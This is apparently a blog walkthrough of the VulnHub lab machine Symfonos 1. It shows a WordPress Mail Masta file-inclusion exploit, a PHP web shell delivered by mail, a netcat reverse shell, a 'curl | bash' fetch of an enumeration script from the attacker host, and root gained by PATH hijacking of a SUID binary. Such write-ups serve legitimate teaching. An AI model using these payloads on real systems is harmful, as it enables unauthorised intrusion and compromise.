Symfonos 1
This VM is recently added to vulnhub and is advertised as a real life based machine designed to teach a interesting way of obtaining a low priv shell. The level is beginner, but as it is the first part of a serie I like to do every part.
Enumeration
Starting with a portscan to get a view on what kind of ports are open on the system and what services are running behind them.
PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 7.4p1 Debian 10+deb9u6 (protocol 2.0) | ssh-hostkey: | 2048 ab:5b:45:a7:05:47:a5:04:45:ca:6f:18:bd:18:03:c2 (RSA) | 256 a0:5f:40:0a:0a:1f:68:35:3e:f4:54:07:61:9f:c6:4a (ECDSA) |_ 256 bc:31:f5:40:bc:08:58:4b:fb:66:17:ff:84:12:ac:1d (ED25519) 25/tcp open smtp Postfix smtpd |_smtp-commands: symfonos.localdomain, PIPELINING, SIZE 10240000, VRFY, ETRN, STARTTLS, ENHANCEDSTATUSCODES, 8BITMIME, DSN, SMTPUTF8, 80/tcp open http Apache httpd 2.4.25 ((Debian)) |_http-server-header: Apache/2.4.25 (Debian) |_http-title: Site doesn't have a title (text/html). 139/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP) 445/tcp open netbios-ssn Samba smbd 4.5.16-Debian (workgroup: WORKGROUP) MAC Address: 00:0C:29:2A:D4:AA (VMware) Service Info: Hosts: symfonos.localdomain, SYMFONOS; OS: Linux; CPE: cpe:/o:linux:linux_kernel Host script results: |_clock-skew: mean: 1h39m57s, deviation: 2h53m12s, median: -2s |_nbstat: NetBIOS name: SYMFONOS, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown) | smb-os-discovery: | OS: Windows 6.1 (Samba 4.5.16-Debian) | Computer name: symfonos | NetBIOS computer name: SYMFONOS\x00 | Domain name: \x00 | FQDN: symfonos |_ System time: 2019-08-01T04:16:29-05:00 | smb-security-mode: | account_used: guest | authentication_level: user | challenge_response: supported |_ message_signing: disabled (dangerous, but default) | smb2-security-mode: | 2.02: |_ Message signing enabled but not required | smb2-time: | date: 2019-08-01 11:16:29 |_ start_date: N/A
These ports are open:
- port 22, which runs a recent version of OpenSSH
- port 25, which runs a PostFix SMTP server (from the scan there is no version number available)
- port 80, which runs a Apache2 webserver version 2.4.25
- port 139, NetBIOS session client version 3.x – 4.x
- port 445, Samba version 4.5.16-Debian
Webserver
Let’s start with the webserver first. The website itself is nothing more then a picture. There is nothing in the source and the picture itself seems to hold no hidden features.
root@cyberspace:~/symfonos1# dirsearch -u http://10.10.10.10 -e html,htm,php,txt -x 403,404 -w /usr/share/wordlists/dirbuster/directory-list-lowercase-2.3-medium.txt _|. _ _ _ _ _ _|_ v0.3.8 (_||| _) (/_(_|| (_| ) Extensions: html, htm, php, txt | HTTP method: get | Threads: 10 | Wordlist size: 207627 Error Log: /opt/tools/dirsearch/logs/errors-19-08-01_11-38-22.log Target: http://10.10.10.10 [11:38:22] Starting: [11:38:22] 200 - 328B - / [11:38:24] 301 - 311B - /manual -> http://10.10.10.10/manual/ Task Completed
DirSearch nor Nikto show something interesting. For now, I turn my focus to another port.
Samba
To enumerate an SMB server I use smbmap.
root@cyberspace:~/symfonos1# smbmap -r -H 10.10.10.10 [+] Finding open SMB ports.... [+] Guest SMB session established on 10.10.10.10... [+] IP: 10.10.10.10:445 Name: 10.10.10.10 Disk Permissions ---- ----------- print$ NO ACCESS helios NO ACCESS anonymous READ ONLY ./ dr--r--r-- 0 Sat Jun 29 03:14:49 2019 . dr--r--r-- 0 Sat Jun 29 03:12:15 2019 .. fr--r--r-- 154 Sat Jun 29 03:14:49 2019 attention.txt IPC$ NO ACCESS
It looks like there is a document that I can download.
root@cyberspace:~/symfonos1/smb# smbclient \\\\10.10.10.10\\anonymous Enter WORKGROUP\root's password: Try "help" to get a list of possible commands. smb: \> ls . D 0 Sat Jun 29 03:14:49 2019 .. D 0 Sat Jun 29 03:12:15 2019 attention.txt N 154 Sat Jun 29 03:14:49 2019 19994224 blocks of size 1024. 17259504 blocks available smb: \> get attention.txt getting file \attention.txt of size 154 as attention.txt (75.2 KiloBytes/sec) (average 75.2 KiloBytes/sec) smb: \> quit
root@cyberspace:~/symfonos1/smb# cat attention.txt Can users please stop using passwords like 'epidioko', 'qwerty' and 'baseball'! Next person I find using one of these passwords will be fired! -Zeus
That’s a nice hint about certain passwords. Also the name Zeus could mean the usernames are Greek gods. Let’s put these so called passwords into a file. One of the shares is called helios. Let’s see if helios also uses a weak password.
root@cyberspace:~/symfonos1# smbclient \\\\10.10.10.10\\helios -U helios Enter WORKGROUP\helios's password: Try "help" to get a list of possible commands. smb: \> ls . D 0 Sat Jun 29 02:32:05 2019 .. D 0 Sat Jun 29 02:37:04 2019 research.txt A 432 Sat Jun 29 02:32:05 2019 todo.txt A 52 Sat Jun 29 02:32:05 2019 19994224 blocks of size 1024. 17259504 blocks available smb: \> get research.txt getting file \research.txt of size 432 as research.txt (140.6 KiloBytes/sec) (average 140.6 KiloBytes/sec) smb: \> get todo.txt getting file \todo.txt of size 52 as todo.txt (25.4 KiloBytes/sec) (average 94.5 KiloBytes/sec)
Looks like the user ‘helios’ uses one of the weak passwords.
root@cyberspace:~/symfonos1/smb# cat research.txt Helios (also Helius) was the god of the Sun in Greek mythology. He was thought to ride a golden chariot which brought the Sun across the skies each day from the east (Ethiopia) to the west (Hesperides) while at night he did the return journey in leisurely fashion lounging in a golden cup. The god was famously the subject of the Colossus of Rhodes, the giant bronze statue considered one of the Seven Wonders of the Ancient World.
root@cyberspace:~/symfonos1/smb# cat todo.txt 1. Binge watch Dexter 2. Dance 3. Work on /h3l105
Looks like he is working on a folder called /h3l105. Let’s check if this folder exists on the webserver.
WordPress
root@cyberspace:~/symfonos1# dirsearch -u 10.10.10.10/h3l105 -e php -f -x 403,404 _|. _ _ _ _ _ _|_ v0.3.8 (_||| _) (/_(_|| (_| ) Extensions: php | HTTP method: get | Threads: 10 | Wordlist size: 10301 Error Log: /opt/tools/dirsearch/logs/errors-19-08-01_12-16-51.log Target: 10.10.10.10/h3l105 [12:16:51] Starting: [12:17:03] 301 - 0B - /h3l105/index.php -> http://10.10.10.10/h3l105/ [12:17:03] 301 - 0B - /h3l105/index.php/ -> http://10.10.10.10/h3l105/ [12:17:12] 200 - 0B - /h3l105/wp-content/ [12:17:12] 500 - 3KB - /h3l105/wp-admin/setup-config.php/ [12:17:12] 302 - 0B - /h3l105/wp-admin/ -> http://symfonos.local/h3l105/wp-login.php?redirect_to=http%3A%2F%2F10.10.10.10%2Fh3l105%2Fwp-admin%2F&reauth=1 [12:17:12] 200 - 0B - /h3l105/wp-config.php [12:17:12] 200 - 69B - /h3l105/wp-content/plugins/akismet/akismet.php/ [12:17:12] 200 - 1KB - /h3l105/wp-admin/install.php/ [12:17:12] 200 - 1KB - /h3l105/wp-content/uploads/ [12:17:12] 500 - 0B - /h3l105/wp-includes/rss-functions.php/ [12:17:12] 200 - 44KB - /h3l105/wp-includes/ [12:17:12] 200 - 3KB - /h3l105/wp-login.php/ [12:17:12] 200 - 3KB - /h3l105/wp-login.php [12:17:12] 405 - 42B - /h3l105/xmlrpc.php/ Task Completed
Looks like a wordpress site. When running wpscan I get several vulnerabilities and an username (admin).
[+] mail-masta | Location: http://symfonos.local/h3l105/wp-content/plugins/mail-masta/ | Latest Version: 1.0 (up to date) | Last Updated: 2014-09-19T07:52:00.000Z | | Detected By: Urls In Homepage (Passive Detection) | | [!] 2 vulnerabilities identified: | | [!] Title: Mail Masta 1.0 - Unauthenticated Local File Inclusion (LFI) | References: | - https://wpvulndb.com/vulnerabilities/8609 | - https://www.exploit-db.com/exploits/40290/ | - https://cxsecurity.com/issue/WLB-2016080220 | | [!] Title: Mail Masta 1.0 - Multiple SQL Injection | References: | - https://wpvulndb.com/vulnerabilities/8740 | - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-6095 | - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-6096 | - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-6097 | - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-6098 | - https://github.com/hamkovic/Mail-Masta-Wordpress-Plugin | | Version: 1.0 (100% confidence) | Detected By: Readme - Stable Tag (Aggressive Detection) | - http://symfonos.local/h3l105/wp-content/plugins/mail-masta/readme.txt | Confirmed By: Readme - ChangeLog Section (Aggressive Detection) | - http://symfonos.local/h3l105/wp-content/plugins/mail-masta/readme.txt
root@cyberspace:~/symfonos1/web# searchsploit mail masta
-------------------------------------------------------------------------------------------------------------------------------------------------------------------------- ----------------------------------------
Exploit Title | Path
| (/usr/share/exploitdb/)
-------------------------------------------------------------------------------------------------------------------------------------------------------------------------- ----------------------------------------
WordPress Plugin Mail Masta 1.0 - Local File Inclusion | exploits/php/webapps/40290.txt
WordPress Plugin Mail Masta 1.0 - SQL Injection | exploits/php/webapps/41438.txt
-------------------------------------------------------------------------------------------------------------------------------------------------------------------------- ----------------------------------------
Shellcodes: No Result
Here the information about the possible exploits are available. The LFI can be easily tested.
root@cyberspace:~/symfonos1/web# curl -s http://symfonos.local/h3l105/wp-content/plugins/mail-masta/inc/campaign/count_of_send.php?pl=/etc/passwd root:x:0:0:root:/root:/bin/bash daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin bin:x:2:2:bin:/bin:/usr/sbin/nologin sys:x:3:3:sys:/dev:/usr/sbin/nologin sync:x:4:65534:sync:/bin:/bin/sync games:x:5:60:games:/usr/games:/usr/sbin/nologin man:x:6:12:man:/var/cache/man:/usr/sbin/nologin lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin mail:x:8:8:mail:/var/mail:/usr/sbin/nologin news:x:9:9:news:/var/spool/news:/usr/sbin/nologin uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin proxy:x:13:13:proxy:/bin:/usr/sbin/nologin www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin backup:x:34:34:backup:/var/backups:/usr/sbin/nologin list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin systemd-timesync:x:100:102:systemd Time Synchronization,,,:/run/systemd:/bin/false systemd-network:x:101:103:systemd Network Management,,,:/run/systemd/netif:/bin/false systemd-resolve:x:102:104:systemd Resolver,,,:/run/systemd/resolve:/bin/false systemd-bus-proxy:x:103:105:systemd Bus Proxy,,,:/run/systemd:/bin/false _apt:x:104:65534::/nonexistent:/bin/false Debian-exim:x:105:109::/var/spool/exim4:/bin/false messagebus:x:106:111::/var/run/dbus:/bin/false sshd:x:107:65534::/run/sshd:/usr/sbin/nologin helios:x:1000:1000:,,,:/home/helios:/bin/bash mysql:x:108:114:MySQL Server,,,:/nonexistent:/bin/false postfix:x:109:115::/var/spool/postfix:/bin/false
Looks like this works. But for this vulnerability to be useful, I need either files with credentials or to upload a payload that I can trigger.
SMTP
Because of the /etc/passwd file, I know there is a user named helios. I can try and send this user a message with the mail server. The content of this message will be a web shell which hopefully will give me the opportunity to execute with the LFI. Information about web shells are numerous on the internet. Here is an example.
root@cyberspace:~/symfonos1# nc 10.10.10.10 25 220 symfonos.localdomain ESMTP Postfix (Debian/GNU) HELO 501 Syntax: HELO hostname MAIL FROM: n0w4n 250 2.1.0 Ok RCPT TO: helios 250 2.1.5 Ok DATA 354 End data with <CR><LF>.<CR><LF> <?php system($_GET['cmd']); ?> . 250 2.0.0 Ok: queued as A57AF408A1 QUIT 221 2.0.0 Bye
Starting up a listener.
root@cyberspace:~/symfonos1# nc -lvnp 9001 listening on [any] 9001 ...
And now to activate the payload.
root@cyberspace:~/symfonos1# curl -s "http://symfonos.local/h3l105/wp-content/plugins/mail-masta/inc/campaign/count_of_send.php?pl=/var/mail/helios&cmd=nc 10.10.10.13 9001 -e /bin/bash"
root@cyberspace:~/symfonos1# nc -lvnp 9001 listening on [any] 9001 ... connect to [10.10.10.13] from (UNKNOWN) [10.10.10.10] 54432
Escalation of Privileges
id
uid=1000(helios) gid=1000(helios) groups=1000(helios),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),108(netdev)
python -c 'import pty;pty.spawn("/bin/bash");'
<ml/h3l105/wp-content/plugins/mail-masta/inc/lists$
To do a fast enumeration of the system, I use a shell script called “LinEnum”. To run it on the remote system I run a PythonSimpleHTTPServer on my local system and curl it from the remote system. Because I pipe it to bash, I don’t have to download the file to the system, which leaves traces.
helios@symfonos:/tmp$ curl -s http://10.10.10.13:9002/linenum.sh | bash
There is a lot of information, but the most interesting part is a file with the SUID bit set.
helios@symfonos:/tmp$ find / -perm /4000 -type f -exec ls -ld {} \; 2>/dev/null
< -perm /4000 -type f -exec ls -ld {} \; 2>/dev/null
-rwsr-xr-x 1 root root 10232 Mar 27 2017 /usr/lib/eject/dmcrypt-get-device
-rwsr-xr-- 1 root messagebus 42992 Jun 9 16:42 /usr/lib/dbus-1.0/dbus-daemon-launch-helper
-rwsr-xr-x 1 root root 440728 Mar 1 10:19 /usr/lib/openssh/ssh-keysign
-rwsr-xr-x 1 root root 59680 May 17 2017 /usr/bin/passwd
-rwsr-xr-x 1 root root 75792 May 17 2017 /usr/bin/gpasswd
-rwsr-xr-x 1 root root 40312 May 17 2017 /usr/bin/newgrp
-rwsr-xr-x 1 root root 40504 May 17 2017 /usr/bin/chsh
-rwsr-xr-x 1 root root 50040 May 17 2017 /usr/bin/chfn
-rwsr-xr-x 1 root root 8640 Jun 28 20:21 /opt/statuscheck
-rwsr-xr-x 1 root root 44304 Mar 7 2018 /bin/mount
-rwsr-xr-x 1 root root 31720 Mar 7 2018 /bin/umount
-rwsr-xr-x 1 root root 40536 May 17 2017 /bin/su
-rwsr-xr-x 1 root root 61240 Nov 10 2016 /bin/ping
The file of interest is /opt/statuscheck. This is not a well-known SUID file and should be investigated more.
helios@symfonos:/tmp$ file /opt/statuscheck file /opt/statuscheck /opt/statuscheck: setuid ELF 64-bit LSB shared object, x86-64, version 1 (SYSV), dynamically linked, interpreter /lib64/ld-linux-x86-64.so.2, for GNU/Linux 2.6.32, BuildID[sha1]=4dc315d863d033acbe07b2bfc6b5b2e72406bea4, not stripped
helios@symfonos:/tmp$ /opt/statuscheck /opt/statuscheck HTTP/1.1 200 OK Date: Thu, 01 Aug 2019 15:28:28 GMT Server: Apache/2.4.25 (Debian) Last-Modified: Sat, 29 Jun 2019 00:38:05 GMT ETag: "148-58c6b9bb3bc5b" Accept-Ranges: bytes Content-Length: 328 Vary: Accept-Encoding Content-Type: text/html
Looks like the return of a curl command.
helios@symfonos:/tmp$ curl -I 10.10.10.10 curl -I 10.10.10.10 HTTP/1.1 200 OK Date: Thu, 01 Aug 2019 15:30:47 GMT Server: Apache/2.4.25 (Debian) Last-Modified: Sat, 29 Jun 2019 00:38:05 GMT ETag: "148-58c6b9bb3bc5b" Accept-Ranges: bytes Content-Length: 328 Vary: Accept-Encoding Content-Type: text/html
Now to use this to my advantage. For this I will use the PATH variable. First I create a file called curl, because I know that the program statuscheck calls on curl and set all the bits.
helios@symfonos:/tmp$ echo "/bin/sh" > curl echo "/bin/sh" > curl helios@symfonos:/tmp$ chmod 777 curl chmod 777 curl
Then I add /tmp to PATH. This way statuscheck will look for the first folder in PATH which contains the file curl. Because /tmp is first, it will think this is the correct curl which it needs to execute.
helios@symfonos:/tmp$ export PATH=/tmp:$PATH export PATH=/tmp:$PATH
Then run the program and get root.
helios@symfonos:/tmp$ /opt/statuscheck /opt/statuscheck # whoami whoami root
Now to finish this challenge.
# cat proof.txt
cat proof.txt
Congrats on rooting symfonos:1!
\ __
--==/////////////[})))==*
/ \ ' ,|
`\`\ //| ,|
\ `\ //,/' -~ |
) _-~~~\ |/ / |'| _-~ / ,
(( /' ) | \ / /'/ _-~ _/_-~|
((( ; /` ' )/ /'' _ -~ _-~ ,/'
) )) `~~\ `\\/'/|' __--~~__--\ _-~ _/,
((( )) / ~~ \ /~ __--~~ --~~ __/~ _-~ /
((\~\ | ) | ' / __--~~ \-~~ _-~
`\(\ __--( _/ |'\ / --~~ __--~' _-~ ~|
( ((~~ __-~ \~\ / ___---~~ ~~\~~__--~
~~\~~~~~~ `\-~ \~\ / __--~~~'~~/
;\ __.-~ ~-/ ~~~~~__\__---~~ _..--._
;;;;;;;;' / ---~~~/_.-----.-~ _.._ ~\
;;;;;;;' / ----~~/ `\,~ `\ \
;;;;' ( ---~~/ `:::| `\\.
|' _ `----~~~~' / `:| ()))),
______/\/~ | / / (((((())
/~;;.____/;;' / ___.---( `;;;/ )))'`))
/ // _;______;'------~~~~~ |;;/\ / (( (
// \ \ / | \;;,\ `
(<_ \ \ /',/-----' _>
\_| \\_ //~;~~~~~~~~~
\_| (,~~
\~\
~~
Contact me via Twitter @zayotic to give feedback!
This was a nice challenge to start with. Because there are two more, Symfonos 2 will be next. A thanks to @zayotic for a fun challenge.